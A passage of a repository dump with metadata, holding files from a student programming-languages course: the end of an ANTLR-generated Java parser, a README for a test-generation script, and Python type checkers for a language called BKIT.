}\n\n\t@Override\n\tpublic String getSerializedATN() { return _serializedATN; }\n\n\t@Override\n\tpublic ATN getATN() { return _ATN; }\n\n\tpublic BKITParser(TokenStream input) {\n\t\tsuper(input);\n\t\t_interp = new ParserATNSimulator(this,_ATN,_decisionToDFA,_sharedContextCache);\n\t}\n\n\tpublic static class ProgramContext extends ParserRuleContext {\n\t\tpublic ProgramContext(ParserRuleContext parent, int invokingState) {\n\t\t\tsuper(parent, invokingState);\n\t\t}\n\t\t@Override public int getRuleIndex() { return RULE_program; }\n\t\t@Override\n\t\tpublic void enterRule(ParseTreeListener listener) {\n\t\t\tif ( listener instanceof BKITListener ) ((BKITListener)listener).enterProgram(this);\n\t\t}\n\t\t@Override\n\t\tpublic void exitRule(ParseTreeListener listener) {\n\t\t\tif ( 
listener instanceof BKITListener ) ((BKITListener)listener).exitProgram(this);\n\t\t}\n\t}\n\n\tpublic final ProgramContext program() throws RecognitionException {\n\t\tProgramContext _localctx = new ProgramContext(_ctx, getState());\n\t\tenterRule(_localctx, 0, RULE_program);\n\t\ttry {\n\t\t\tenterOuterAlt(_localctx, 1);\n\t\t\t{\n\t\t\t}\n\t\t}\n\t\tcatch (RecognitionException re) {\n\t\t\t_localctx.exception = re;\n\t\t\t_errHandler.reportError(this, re);\n\t\t\t_errHandler.recover(this, re);\n\t\t}\n\t\tfinally {\n\t\t\texitRule();\n\t\t}\n\t\treturn _localctx;\n\t}\n\n\tpublic static final String _serializedATN =\n\t\t\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3D\\7\\4\\2\\t\\2\\3\\2\\3\"+\n\t\t\"\\2\\3\\2\\2\\2\\3\\2\\2\\2\\2\\5\\2\\4\\3\\2\\2\\2\\4\\5\\3\\2\\2\\2\\5\\3\\3\\2\\2\\2\\2\";\n\tpublic static final ATN _ATN =\n\t\tnew ATNDeserializer().deserialize(_serializedATN.toCharArray());\n\tstatic {\n\t\t_decisionToDFA = new DFA[_ATN.getNumberOfDecisions()];\n\t\tfor (int i = 0; i < _ATN.getNumberOfDecisions(); i++) {\n\t\t\t_decisionToDFA[i] = new DFA(_ATN.getDecisionState(i), i);\n\t\t}\n\t}\n}" }, { "alpha_fraction": 0.549582302570343, "alphanum_fraction": 0.5586632490158081, "avg_line_length": 28.602149963378906, "blob_id": "fa5a52dfe28716ebf6a09f777d371f75ce26a784", "content_id": "a6c103bdd52694fd83b1113ce0d47a30075ddc35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2753, "license_type": "no_license", "max_line_length": 83, "num_lines": 93, "path": "/type/Q2.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class Program: pass #decl:List[VarDecl],exp:Exp\n\nclass VarDecl: pass #name:str,typ:Type\n\nclass Type(ABC): pass #abstract class\n\nclass IntType(Type): pass\n\nclass FloatType(Type): pass\n\nclass BoolType(Type): pass\n\nclass Exp(ABC): pass #abstract class\n\nclass BinOp(Exp): pass #op:str,e1:Exp,e2:Exp #op is +,-,*,/,&&,||, >, <, ==, or 
!=\n\nclass UnOp(Exp): pass #op:str,e:Exp #op is -, !\n\nclass IntLit(Exp): pass #val:int\n\nclass FloatLit(Exp): pass #val:float\n\nclass BoolLit(Exp): pass #val:bool\n\nclass Id(Exp): pass #name:str\n\n\nfrom functools import reduce\nclass StaticCheck(Visitor):\n \n def visitProgram(self,ctx:Program,o):\n env = reduce(lambda lst, x: lst + [self.visitVarDecl(x)], ctx.decl, [])\n self.visit(ctx.exp, env)\n\n def visitVarDecl(self,ctx:VarDecl,o):\n return {\"name\" : ctx.name, \"type\": ctx.typ}\n\n def visitBinOp(self,ctx:BinOp,o):\n e1 = self.visit(ctx.e1, o)\n e2 = self.visit(ctx.e2, o)\n if ctx.op in ['+', '-', '*']:\n if isinstance(e1, BoolLit) or isinstance(e2, BoolLit):\n raise TypeMismatchInExpression(ctx)\n if isinstance(e1, FloatLit) or isinstance(e2, FloatLit):\n return FloatLit(0)\n else:\n return IntLit(0)\n if ctx.op in ['/']:\n if isinstance(e1, BoolLit) or isinstance(e2, BoolLit):\n raise TypeMismatchInExpression(ctx)\n return FloatLit(0)\n \n if ctx.op in ['&&', '||']:\n if isinstance(e1, BoolLit) and isinstance(e2, BoolLit):\n return BoolLit(True)\n raise TypeMismatchInExpression(ctx)\n else:\n if type(e1) != type(e2):\n raise TypeMismatchInExpression(ctx)\n return BoolLit(True)\n\n def visitUnOp(self,ctx:UnOp,o):\n e = self.visit(ctx.e, o)\n if ctx.op in ['-']:\n if isinstance(e, BoolLit):\n raise TypeMismatchInExpression(ctx)\n return e\n if ctx.op in ['!']:\n if not isinstance(e, BoolLit):\n raise TypeMismatchInExpression(ctx)\n return e\n\n def visitIntLit(self,ctx:IntLit,o):\n return IntLit(0)\n\n def visitFloatLit(self,ctx,o):\n return FloatLit(0)\n\n def visitBoolLit(self,ctx,o):\n return BoolLit(True)\n\n def visitId(self,ctx,o):\n a = [idx for (idx, d) in enumerate(o) if d[\"name\"] == ctx.name]\n if len(a) == 0:\n raise UndeclaredIdentifier(ctx.name)\n else:\n typ = o[a[0]][\"type\"]\n if isinstance(typ, IntType):\n return IntLit(0)\n if isinstance(typ, FloatType):\n return FloatLit(0)\n else:\n return BoolLit(True)\n" }, { 
"alpha_fraction": 0.7094051241874695, "alphanum_fraction": 0.7098070979118347, "avg_line_length": 33.095890045166016, "blob_id": "237ff000256699e49b49f3b9ef8fc43cddf05a30", "content_id": "259ffa9d3794655fa251cab0e8576b6fc4fc98eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2488, "license_type": "no_license", "max_line_length": 317, "num_lines": 73, "path": "/Assignments/assignment2/src1.1/README.md", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# AST TREE GEN\n\n## TEST_GEN_TOOL\n\n**Download files: AST_GEN_TEST.py, gen_test.py then place them in the same folder with AST.py and run.py respectively**\n\nYou need to install some module if not installed, like this one:\n\n```bash\npip install tqdm\n```\n\nTo generate the ASTGenSuite.py, you need to write all testcases in format .txt which are store a same <test_folder_dir>. After prepare all the testcase, or some of them, you can gen by the gen_test.py. 
To see help:\n\n```bash\npython gen_test.py -h\n\noptional arguments:\n -h, --help show this help message and exit\n --testcase_dir TESTCASE_DIR\n the testcase directory where you store the testcase in *.txt format\n --solution_dir SOLUTION_DIR\n the testcase directory where you store the solution in *.txt format if there is no solution, please active the gen_sold\n --suite_dir SUITE_DIR\n the testcase directory where you store the solution in *.txt format if there is no solution, please active the gen_sold\n --gen_sol GEN_SOL active the gen solution, you need to place the AST_GEN_TEST.py in the same dir with AST.py\n```\n\nFor the first time, you have to active the --gen_sol by True value to generate the solution in full options in the <sol_folder_dir>.\n\n```bash\npython gen_test.py --testcase_dir <test_folder_dir> --solution_dir <sol_folder_dir> --suite_dir ASTGenSuite.py --gen_sol True\n```\n\nYou can also ignore any of them if you satisfy with the default of them below:\n\n<suite_dir>: './test/ASTGenSuite.py'\n\n<test_folder_dir>: './test/testcases/'\n\n<sol_folder_dir>: './test/solutions/'\n\n<gen_sol>: False\n\n## GEN TESTCASE\n\nFirst of all, let replace the AST module by the AST_GEN_TEST.py:\n\n```python\n# from AST import *\nfrom AST_GEN_TEST import * \n```\n\nThen run something like:\n\n```bash\npython gen_test.py --gen_sol True\n```\n\nAfter this, there will be a full of testcases ASTGenSuite.py. Inactive the AST_GEN_TEST and active AST:\n\n```python\nfrom AST import *\n# from AST_GEN_TEST import * \n```\n\nNow, you can use this AST_GEN_SUITE to check your ASTGeneration as normal as nothing happen.\n\n```bash\npython run.py test ASTGenSuite\n```\n\n**DISCLAIMER:** I write this tool in only 1 hour so be careful with the error. Please commit you repo before use this tool in order to avoid any problem. 
If you see some bugs of the gen processs, please fix it yourself or report it to my [facebook](fb.com/sotfdat) for help (I rarely reply the message from stranger)." }, { "alpha_fraction": 0.5327810049057007, "alphanum_fraction": 0.534298837184906, "avg_line_length": 40.977874755859375, "blob_id": "a83cb6ebdc1d967d51f4b34d977c70b90c88f618", "content_id": "8b16de80fab9d6859452d9f1434dd5842b04a83f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47436, "license_type": "no_license", "max_line_length": 119, "num_lines": 1130, "path": "/Assignments/assignment3/src/main/bkit/checker/StaticCheck.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "\n\"\"\"\n * @author nhphung\n\"\"\"\nfrom abc import ABC, abstractmethod, ABCMeta\nfrom dataclasses import dataclass\nfrom typing import List, Tuple\n# from AST import *\nfrom AST_GEN_TEST import *\nfrom Visitor import *\nfrom StaticError import *\nfrom functools import *\n\nclass Type(ABC):\n __metaclass__ = ABCMeta\n pass\nclass Prim(Type):\n __metaclass__ = ABCMeta\n pass\nclass IntType(Prim):\n pass\nclass FloatType(Prim):\n pass\nclass StringType(Prim):\n pass\nclass BoolType(Prim):\n pass\nclass VoidType(Type):\n pass\nclass Unknown(Type):\n pass\n\n@dataclass\nclass ArrayType(Type):\n dimen:List[int]\n eletype: Type\n\n@dataclass\nclass MType:\n intype:List[Type]\n restype:Type\n\n@dataclass\nclass Symbol:\n name: str\n mtype:Type\n\n\nclass StaticChecker(BaseVisitor):\n def __init__(self,ast):\n self.ast = ast\n self.global_envi = 
[\nSymbol(\"int_of_float\",MType([FloatType()],IntType())),\nSymbol(\"float_of_int\",MType([IntType()],FloatType())),\nSymbol(\"int_of_string\",MType([StringType()],IntType())),\nSymbol(\"string_of_int\",MType([IntType()],StringType())),\nSymbol(\"float_of_string\",MType([StringType()],FloatType())),\nSymbol(\"string_of_float\",MType([FloatType()],StringType())),\nSymbol(\"bool_of_string\",MType([StringType()],BoolType())),\nSymbol(\"string_of_bool\",MType([BoolType()],StringType())),\nSymbol(\"read\",MType([],StringType())),\nSymbol(\"printLn\",MType([],VoidType())),\nSymbol(\"printStr\",MType([StringType()],VoidType())),\nSymbol(\"printStrLn\",MType([StringType()],VoidType()))]\n\n \n def check(self):\n normalize_global = []\n for symbol in self.global_envi:\n intype = []\n if len(symbol.mtype.intype):\n for idx in range(len(symbol.mtype.intype)):\n intype.append(Symbol('', symbol.mtype.intype[idx]))\n symbol.mtype.intype = intype\n return self.visit(self.ast,self.global_envi)\n \n\n def visitProgram(self,ast,c):\n \"\"\"\n Phase 1:\n -> visit all declaration -> create a stack base frame\n ERROR: Redeclared, NoEntryPoint\n Phase 2:\n -> inference the type by visit function.scope\n ERROR: Undeclare, TypeMismatchInExpression, TypeMismatchInStatement\n TypeCannotBeInferred\n \"\"\"\n global_scope = reduce(lambda env, x: [self.visitGlobal(x, env)] + env, ast.decl, c)\n self.env = global_scope\n self.hasEntryPoint = False\n [self.visit(x,self.env) for x in ast.decl]\n if self.hasEntryPoint == False:\n raise NoEntryPoint()\n\n def visitVarDecl(self, ast, c):\n \"\"\"\n Visit each global var top-down\n \"\"\"\n symbol = self.visit(ast.variable, c)\n if symbol is None:\n symbol = Symbol(ast.variable.name, None)\n if symbol.mtype is not None:\n raise Redeclared(Variable(), symbol.name)\n symbol.mtype = Unknown()\n dimen = list(ast.varDimen)\n init_type = self.visit(ast.varInit, []) if ast.varInit else Symbol('', Unknown())\n if len(dimen):\n if not 
isinstance(init_type.mtype, (ArrayType, Unknown)):\n \"\"\"\n Declaration of array with mismatch type is TypeMismatch\n or Type can not be infered\n \"\"\"\n raise TypeMismatchInStatement(ast)\n \n if isinstance(init_type.mtype, ArrayType):\n if dimen != init_type.mtype.dimen:\n raise TypeMismatchInStatement(ast)\n symbol.mtype = init_type.mtype\n return symbol\n else:\n symbol.mtype = ArrayType(dimen, Unknown())\n return symbol\n else:\n if isinstance(init_type.mtype, ArrayType):\n raise TypeMismatchInStatement(ast)\n symbol.mtype = init_type.mtype\n \n return symbol\n\n def visitFuncDecl(self, ast, env):\n \"\"\"\n docstring\n \"\"\"\n symbol = self.visit(ast.name, env)\n if symbol.name == 'main':\n self.hasEntryPoint = True\n param = []\n try:\n param = reduce(lambda env, x: env + [self.visit(x, env)], ast.param, [])\n except Redeclared as e:\n raise Redeclared(Parameter(), e.n)\n if len(symbol.mtype.intype) != len(param):\n raise TypeMismatchInExpression(ast)\n if len(symbol.mtype.intype):\n if symbol.mtype.intype[0]:\n # Was inferred (was inferred in somewhere before visit)\n for idx in range(len(param)):\n if isinstance(symbol.mtype.intype[idx].mtype, MType):\n param[idx].mtype = symbol.mtype.intype[idx].mtype.restype \n else:\n param[idx].mtype = symbol.mtype.intype[idx].mtype\n else:\n symbol.mtype.intype = param\n\n scope_env = reduce(lambda env, x: [self.visit(x, env)] + env, ast.body[0], param)\n cur_env = scope_env + env\n\n res_type_list = []\n for stmt in ast.body[1]:\n try:\n typ = self.visit(stmt, cur_env)\n if typ is not None:\n if not symbol.mtype.restype:\n symbol.mtype.restype = typ.mtype\n if type(symbol.mtype.restype) != type(typ.mtype):\n raise TypeMismatchInStatement(stmt)\n res_type_list += [typ]\n except TypeCannotBeInferred:\n raise TypeCannotBeInferred(stmt)\n if not symbol.mtype.restype:\n raise FunctionNotReturn(symbol.name)\n \n param_list = cur_env[len(scope_env) - len(param): len(scope_env)]\n \n symbol.mtype.intype = param_list\n # 
print('sym_name: {}, sym_type: {}'.format(symbol.name, symbol.mtype))\n\n def visitArrayCell(self, ast, env):\n \"\"\"\n For an array indexing E[E1]...[En], -\n E must be in array type with n dimensions and E1...En must be integer.\n Input: All arraycell must be declared in vardecl, so there no redeclared\n \"\"\"\n e = self.visit(ast.arr, env)\n if e is None:\n raise Undeclared(Identifier(), ast.arr)\n if not isinstance(e.mtype, (ArrayType,MType)):\n raise TypeMismatchInExpression(ast)\n if isinstance(e.mtype, ArrayType):\n if len(e.mtype.dimen) != len(ast.idx):\n raise TypeMismatchInExpression(ast)\n if isinstance(e.mtype, MType):\n if isinstance(e.mtype.restype, (Unknown)):\n e.mtype.restype = ArrayType([0]*len(ast.idx), Unknown())\n if isinstance(e.mtype.restype, ArrayType):\n if len(e.mtype.restype.dimen) != len(ast.idx):\n raise TypeMismatchInExpression(ast)\n e.mtype.restype = e.mtype.restype.eletype\n else:\n raise TypeMismatchInExpression(ast)\n e_i = [self.visit(x, env) for x in ast.idx]\n for e_k in e_i:\n if isinstance(e_k.mtype, (Prim, Unknown)):\n if isinstance(e_k.mtype, Unknown):\n e_k.mtype = IntType()\n if not isinstance(e_k.mtype, IntType):\n raise TypeMismatchInExpression(ast)\n if isinstance(e_k.mtype, ArrayType):\n if isinstance(e_k.mtype.eletype, Unknown):\n e_k.mtype.eletype = IntType()\n if not isinstance(e_k.mtype.eletype, IntType):\n raise TypeMismatchInExpression(ast)\n if isinstance(e_k.mtype, MType):\n if isinstance(e_k.mtype.restype, Unknown):\n e_k.mtype.restype = IntType()\n if not isinstance(e_k.mtype.restype, IntType):\n raise TypeMismatchInExpression(ast)\n \n return e\n \n\n def visitBinaryOp(self, ast, env):\n \"\"\"\n ==, ! 
=, <, >, <=, >=, = / =, < ., > ., <= ., >= .\n \"\"\"\n # RELATIONAL\n ## Int\n ltype = rtype = None\n if ast.op in ['==', '!=', '<', '>', '>=', '<=']:\n l = self.visit(ast.left, env)\n if l is None:\n raise Undeclared(Identifier(), ast.left.name)\n if isinstance(l.mtype, Unknown):\n l.mtype = IntType()\n ltype = l.mtype\n if isinstance(l.mtype, ArrayType):\n if isinstance(l.mtype.eletype, Unknown):\n l.mtype.eletype = IntType()\n ltype = l.mtype.eletype\n if isinstance(l.mtype, MType):\n if isinstance(l.mtype.restype, Unknown):\n l.mtype.restype = IntType()\n ltype = l.mtype.restype\n r = self.visit(ast.right, env)\n if r is None:\n raise Undeclared(Identifier(), ast.right.name)\n if isinstance(r.mtype, Unknown):\n r.mtype = IntType()\n rtype = r.mtype\n if isinstance(r.mtype, ArrayType):\n if isinstance(r.mtype.eletype, Unknown):\n r.mtype.eletype = IntType()\n rtype = r.mtype.eletype\n if isinstance(r.mtype, MType):\n if isinstance(r.mtype.restype, Unknown):\n r.mtype.restype = IntType()\n rtype = r.mtype.restype\n if not isinstance(ltype, IntType) or not isinstance(rtype, IntType):\n raise TypeMismatchInExpression(ast)\n return Symbol('', BoolType())\n ## Float\n if ast.op in ['=/=', '<.', '>.', '>=.', '<=.']: \n l = self.visit(ast.left, env)\n if l is None:\n raise Undeclared(Identifier(), ast.left.name)\n if isinstance(l.mtype, Unknown):\n l.mtype = FloatType()\n ltype = l.mtype\n if isinstance(l.mtype, ArrayType):\n if isinstance(l.mtype.eletype, Unknown):\n l.mtype.eletype = FloatType()\n ltype = l.mtype.eletype\n if isinstance(l.mtype, MType):\n if isinstance(l.mtype.restype, Unknown):\n l.mtype.restype = FloatType()\n ltype = l.mtype.restype\n\n r = self.visit(ast.right, env)\n if r is None:\n raise Undeclared(Identifier(), ast.right.name)\n if isinstance(r.mtype, Unknown):\n r.mtype = FloatType()\n rtype = r.mtype\n if isinstance(r.mtype, ArrayType):\n if isinstance(r.mtype.eletype, Unknown):\n r.mtype.eletype = FloatType()\n rtype = r.mtype.eletype\n if 
isinstance(r.mtype, MType):\n if isinstance(r.mtype.restype, Unknown):\n r.mtype.restype = FloatType()\n rtype = r.mtype.restype\n if not isinstance(ltype, FloatType) or not isinstance(rtype, FloatType):\n raise TypeMismatchInExpression(ast)\n \n return Symbol('', BoolType())\n \n # BOOLEAN\n if ast.op in ['&&' , '||']:\n l = self.visit(ast.left, env)\n if l is None:\n raise Undeclared(Identifier(), ast.left.name)\n if isinstance(l.mtype, Unknown):\n l.mtype = BoolType()\n ltype = l.mtype\n if isinstance(l.mtype, ArrayType):\n if isinstance(l.mtype.eletype, Unknown):\n l.mtype.eletype = BoolType()\n ltype = l.mtype.eletype\n if isinstance(l.mtype, MType):\n if isinstance(l.mtype.restype, Unknown):\n l.mtype.restype = BoolType()\n ltype = l.mtype.restype\n r = self.visit(ast.right, env)\n if r is None:\n raise Undeclared(Identifier(), ast.right.name)\n if isinstance(r.mtype, Unknown):\n r.mtype = BoolType()\n rtype = r.mtype\n if isinstance(r.mtype, ArrayType):\n if isinstance(r.mtype.eletype, Unknown):\n r.mtype.eletype = BoolType()\n rtype = r.mtype.eletype\n if isinstance(r.mtype, MType):\n if isinstance(r.mtype.restype, Unknown):\n r.mtype.restype = BoolType()\n rtype = r.mtype.restype\n if not isinstance(ltype, BoolType) or not isinstance(rtype, BoolType):\n raise TypeMismatchInExpression(ast)\n \n return Symbol('', BoolType())\n \n # ARITHMETIC\n ## Int\n if ast.op in ['-' , '+', '*', '\\\\', '%']:\n l = self.visit(ast.left, env)\n if l is None:\n raise Undeclared(Identifier(), ast.left.name)\n if isinstance(l.mtype, Unknown):\n l.mtype = IntType()\n ltype = l.mtype\n if isinstance(l.mtype, ArrayType):\n if isinstance(l.mtype.eletype, Unknown):\n l.mtype.eletype = IntType()\n ltype = l.mtype.eletype\n if isinstance(l.mtype, MType):\n if isinstance(l.mtype.restype, Unknown):\n l.mtype.restype = IntType()\n ltype = l.mtype.restype\n r = self.visit(ast.right, env)\n if r is None:\n raise Undeclared(Identifier(), ast.right.name)\n if isinstance(r.mtype, 
Unknown):\n r.mtype = IntType()\n rtype = r.mtype\n if isinstance(r.mtype, ArrayType):\n if isinstance(r.mtype.eletype, Unknown):\n r.mtype.eletype = IntType()\n rtype = r.mtype.eletype\n if isinstance(r.mtype, MType):\n if isinstance(r.mtype.restype, Unknown):\n r.mtype.restype = IntType()\n rtype = r.mtype.restype\n if not isinstance(ltype, IntType) or not isinstance(rtype, IntType):\n raise TypeMismatchInExpression(ast)\n return Symbol('', IntType())\n \n ## Float\n if ast.op in ['-.' , '+.', '*.', '\\\\.']:\n l = self.visit(ast.left, env)\n if l is None:\n raise Undeclared(Identifier(), ast.left.name)\n if isinstance(l.mtype, Unknown):\n l.mtype = FloatType()\n ltype = l.mtype\n if isinstance(l.mtype, ArrayType):\n if isinstance(l.mtype.eletype, Unknown):\n l.mtype.eletype = FloatType()\n ltype = l.mtype.eletype\n if isinstance(l.mtype, MType):\n if isinstance(l.mtype.restype, Unknown):\n l.mtype.restype = FloatType()\n ltype = l.mtype.restype\n \n r = self.visit(ast.right, env)\n if r is None:\n raise Undeclared(Identifier(), ast.right.name)\n if isinstance(r.mtype, Unknown):\n r.mtype = FloatType()\n rtype = r.mtype\n if isinstance(r.mtype, ArrayType):\n if isinstance(r.mtype.eletype, Unknown):\n r.mtype.eletype = FloatType()\n rtype = r.mtype.eletype\n if isinstance(r.mtype, MType):\n if isinstance(r.mtype.restype, Unknown):\n r.mtype.restype = FloatType()\n rtype = r.mtype.restype\n\n if not isinstance(ltype, FloatType) or not isinstance(rtype, FloatType):\n raise TypeMismatchInExpression(ast)\n \n return Symbol('', FloatType())\n\n def visitUnaryOp(self, ast, env):\n \"\"\"\n docstring\n \"\"\"\n # ARITHMETIC\n ## Int\n otype = None\n if ast.op in ['-']:\n operand = self.visit(ast.body, env)\n if operand is None:\n raise Undeclared(Identifier(), ast.body.name)\n if isinstance(operand.mtype, Unknown):\n operand.mtype = IntType()\n otype = operand.mtype\n if isinstance(operand.mtype, ArrayType):\n if isinstance(operand.mtype.eletype, Unknown):\n 
operand.mtype.eletype = IntType()\n otype = operand.mtype.eletype\n if isinstance(operand.mtype, MType):\n if isinstance(operand.mtype.restype, Unknown):\n operand.mtype.restype = IntType()\n otype = operand.mtype.restype\n if not isinstance(otype, IntType):\n raise TypeMismatchInExpression(ast)\n return Symbol('', IntType())\n ## Float\n if ast.op in ['-.']:\n operand = self.visit(ast.body, env)\n if operand is None:\n raise Undeclared(Identifier, ast.body.name)\n if isinstance(operand.mtype, Unknown):\n operand.mtype = FloatType()\n otype = operand.mtype\n if isinstance(operand.mtype, ArrayType):\n if isinstance(operand.mtype.eletype, Unknown):\n operand.mtype.eletype = FloatType()\n otype = operand.mtype.eletype\n if isinstance(operand.mtype, MType):\n if isinstance(operand.mtype.restype, Unknown):\n operand.mtype.restype = FloatType()\n otype = operand.mtype.restype\n if not isinstance(otype, FloatType):\n raise TypeMismatchInExpression(ast)\n\n return Symbol('', FloatType())\n\n # BOOLEAN\n if ast.op in ['!']:\n operand = self.visit(ast.body, env)\n if operand is None:\n raise Undeclared(Identifier(), ast.body.name)\n if isinstance(operand.mtype, Unknown):\n operand.mtype = BoolType()\n otype = operand.mtype\n if isinstance(operand.mtype, ArrayType):\n if isinstance(operand.mtype.eletype, Unknown):\n operand.mtype.eletype = BoolType()\n otype = operand.mtype.eletype\n if isinstance(operand.mtype, MType):\n if isinstance(operand.mtype.restype, Unknown):\n operand.mtype.restype = BoolType()\n otype = operand.mtype.restype\n\n if not isinstance(otype, BoolType):\n raise TypeMismatchInExpression(ast)\n return Symbol('', BoolType())\n\n def visitCallExpr(self, ast, env):\n \"\"\"\n Return type of call expr is inferred when it call by the \n parent operand (can be infer from op)\n assignment (can be infer from assign statement)\n \"\"\"\n func = self.visit(ast.method, env)\n if func is None or not isinstance(func.mtype, MType):\n raise Undeclared(Function(), 
ast.method.name)\n if len(func.mtype.intype) != len(ast.param):\n raise TypeMismatchInExpression(ast)\n args = [self.visit(arg, env) for arg in ast.param]\n for (idx, arg) in enumerate(ast.param):\n arg_sym = self.visit(arg, env) # arg_type: Symbol\n arg_type = Unknown()\n is_arr = False\n if isinstance(arg_sym.mtype, (Prim, Unknown)):\n arg_type = arg_sym.mtype\n if isinstance(arg_sym.mtype, MType):\n arg_type = arg_sym.mtype.restype\n if isinstance(arg_sym.mtype, ArrayType):\n arg_type = arg_sym.mtype.eletype\n is_arr = True\n if isinstance(arg_type, Unknown):\n if func.mtype.intype[idx] == None:\n raise TypeCannotBeInferred(ast)\n if isinstance(func.mtype.intype[idx].mtype, Prim):\n if isinstance(func.mtype.intype[idx].mtype, Unknown):\n raise TypeCannotBeInferred(ast)\n arg_type = func.mtype.intype[idx].mtype\n if isinstance(func.mtype.intype[idx].mtype, MType):\n if isinstance(func.mtype.intype[idx].mtype.restype, Unknown):\n raise TypeCannotBeInferred(ast)\n arg_type = func.mtype.intype[idx].mtype.restype\n if isinstance(func.mtype.intype[idx].mtype, ArrayType):\n if not is_arr:\n raise TypeMismatchInExpression(ast)\n if isinstance(func.mtype.intype[idx].mtype.eletype, Unknown):\n raise TypeCannotBeInferred(ast)\n arg_type = func.mtype.intype[idx].mtype.eletype\n \n else: # arg_type is known\n # print(func.mtype.intype[idx])\n # print(arg_sym)\n if func.mtype.intype[idx] == None:\n func.mtype.intype[idx] = arg_sym\n if isinstance(func.mtype.intype[idx].mtype, (Unknown,Prim)):\n if isinstance(func.mtype.intype[idx].mtype, Unknown):\n func.mtype.intype[idx].mtype = arg_type\n if type(func.mtype.intype[idx].mtype) != type(arg_type):\n raise TypeMismatchInExpression(ast)\n if isinstance(func.mtype.intype[idx].mtype, MType):\n if isinstance(func.mtype.intype[idx].mtype.restype, Unknown):\n func.mtype.intype[idx].mtype.restype = arg_type\n if type(func.mtype.intype[idx].mtype.restype) != type(arg_type):\n raise TypeMismatchInExpression(ast)\n if 
isinstance(func.mtype.intype[idx].mtype, ArrayType):\n if not is_arr:\n raise TypeMismatchInExpression(ast)\n if isinstance(func.mtype.intype[idx].mtype.eletype, Unknown):\n func.mtype.intype[idx].mtype.eletype = arg_type\n if type(func.mtype.intype[idx].mtype.eletype) != type(arg_type):\n raise TypeMismatchInExpression(ast)\n if type(func.mtype.intype[idx]) != type(arg_sym):\n # array type not match\n raise TypeMismatchInExpression(ast)\n \n if isinstance(arg_sym.mtype, (Prim, Unknown)):\n arg_sym.mtype = arg_type\n if isinstance(arg_sym.mtype, MType):\n arg_sym.mtype.restype = arg_type\n if isinstance(arg_sym.mtype, ArrayType):\n arg_sym.mtype.eletype = arg_type\n if func.mtype.restype == None:\n func.mtype.restype = Unknown()\n return func\n \n def visitIntLiteral(self, ast, env):\n return Symbol('', IntType())\n\n def visitStringLiteral(self, ast, env):\n return Symbol('', StringType())\n\n def visitBooleanLiteral(self, ast, env):\n return Symbol('', BoolType())\n \n def visitFloatLiteral(self, ast, env):\n return Symbol('', FloatType())\n\n def visitArrayLiteral(self, ast, env):\n type_of_arr = [self.visit(x,[]) for x in ast.value]\n if not len(type_of_arr):\n return Symbol('',ArrayType([0], Unknown()))\n num_of_type = reduce(lambda count, x: count if self.is_same_type(x, type_of_arr[0]) else count + 1,\\\n type_of_arr, 1)\n if num_of_type == 1:\n \"\"\"\n Same type for all elements in array\n \"\"\"\n curr_dimen = [len(type_of_arr)]\n last_dimen = type_of_arr[0].mtype.dimen if isinstance(type_of_arr[0].mtype, ArrayType) else []\n dimen = curr_dimen + last_dimen\n typ = type_of_arr[0].mtype.eletype if isinstance(type_of_arr[0].mtype, ArrayType) else type_of_arr[0].mtype\n return Symbol('',ArrayType(dimen, typ))\n else:\n raise InvalidArrayLiteral(ast)\n\n def visitAssign(self, ast, env):\n \"\"\"\n lhs = rhs\n <Symbol> = <Symbol>\n Can we assign VoidType to VoidType\n \"\"\"\n rtype = ltype = None\n rhs = self.visit(ast.rhs, env)\n if rhs is None:\n raise 
Undeclared(Identifier(), ast.rhs.name)\n\n lhs = self.visit(ast.lhs, env)\n if lhs is None:\n raise Undeclared(Identifier(), ast.lhs.name)\n\n # there will be 9 cases\n # MTYPE = MTYPE\n if isinstance(lhs.mtype, MType) and isinstance(rhs.mtype, MType):\n # if isinstance(rhs.mtype.restype, VoidType) or isinstance(lhs.mtype.restype, VoidType):\n # raise TypeMismatchInExpression(ast)\n if isinstance(rhs.mtype.restype, Unknown):\n rhs.mtype.restype = lhs.mtype\n if isinstance(lhs.mtype.restype, Unknown):\n lhs.mtype.restype = rhs.mtype\n if isinstance(lhs.mtype.restype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(lhs.mtype.restype) != type(rhs.mtype.restype):\n raise TypeMismatchInStatement(ast)\n \n # ARRAY = MTYPE\n if isinstance(lhs.mtype, ArrayType) and isinstance(rhs.mtype, MType):\n if isinstance(ast.lhs, Id):\n raise TypeMismatchInStatement(ast)\n if isinstance(rhs.mtype.restype, VoidType):\n raise TypeMismatchInExpression(ast)\n if isinstance(rhs.mtype.restype, Unknown):\n rhs.mtype.restype = lhs.mtype.eletype\n if isinstance(lhs.mtype.eletype, Unknown):\n lhs.mtype.eletype = rhs.mtype.restype\n if isinstance(lhs.mtype.eletype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(lhs.mtype.eletype) != type(rhs.mtype.restype):\n raise TypeMismatchInStatement(ast)\n \n # PRIM = MTYPE\n if isinstance(lhs.mtype, (Prim, Unknown)) and isinstance(rhs.mtype, MType):\n if isinstance(rhs.mtype.restype, VoidType):\n raise TypeMismatchInExpression(ast)\n if isinstance(rhs.mtype.restype, Unknown):\n rhs.mtype.restype = lhs.mtype\n if isinstance(lhs.mtype, Unknown):\n lhs.mtype = rhs.mtype.restype\n if isinstance(lhs.mtype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(lhs.mtype) != type(rhs.mtype.restype):\n raise TypeMismatchInStatement(ast)\n \n # MTYPE = ARRAY\n if isinstance(lhs.mtype, MType) and isinstance(rhs.mtype, ArrayType):\n if isinstance(ast.rhs, Id):\n raise TypeMismatchInStatement(ast)\n if isinstance(lhs.mtype.restype, VoidType):\n raise 
